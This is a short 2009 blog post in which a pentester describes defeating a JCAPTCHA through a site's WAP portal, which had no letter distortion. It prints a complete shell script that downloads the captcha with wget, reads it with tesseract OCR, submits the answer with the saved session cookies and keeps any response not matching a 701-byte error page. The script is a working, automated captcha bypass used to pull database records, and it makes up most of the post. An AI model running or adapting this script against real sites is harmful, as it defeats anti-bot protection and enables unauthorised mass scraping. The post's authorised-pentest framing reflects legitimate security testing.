Tuesday, January 6, 2009

Captcha circumvention

Last week I was trying to bypass a captcha implementation (JCAPTCHA) on a website I was hired to pentest. Although captchas can get very difficult to bypass I found a "weak link" through the WAP portion of the portal in question and I could extract a significant portion of data abusing the nonexistent distortion of the letters shown in the image.


You'll see, there is an OCR (optical character recognition softare) in Linux (tesseract) capable of "reading" the image given to the user, then this tool will write the characters to a text-file.
Using wget we can start http queries to a website, save and load cookies and write data to the filesystem. Putting it all together, we got a shellscript that will circumvent the captcha protection and extract the data in an automatic fashion (it's effective around 60%).

#!/bin/sh

wget http://www.somesite.com/jcaptcha --save-cookies cookies.txt --keep-session-cookies -O /tmp/captcha.jpg 2> /dev/null
djpeg -grayscale /tmp/captcha.jpg | convert - /tmp/captcha.tiff
tesseract /tmp/captcha.tiff jcaptcha
cap=`cat jcaptcha.txt`
wget "http://www.somesite.com/servlet?niv=&nrpv=&query=$somevalue&captcha=$cap" --load-cookies cookies.txt -O salida.txt 2> /dev/null
tam=`wc -c salida.txt| cut -c1-3`
echo $tam
if [ $tam -ne 701 ]; then
mv salida.txt $query.txt
fi

You may wonder why the script uses a length of 701 bytes to detect if the captcha has been defeated, well, it's just assuming the default "error" page has a length of 701 bytes, any other length it's assumed as info extracted from the database (ok, it's not the best approach, but it's just a PoC).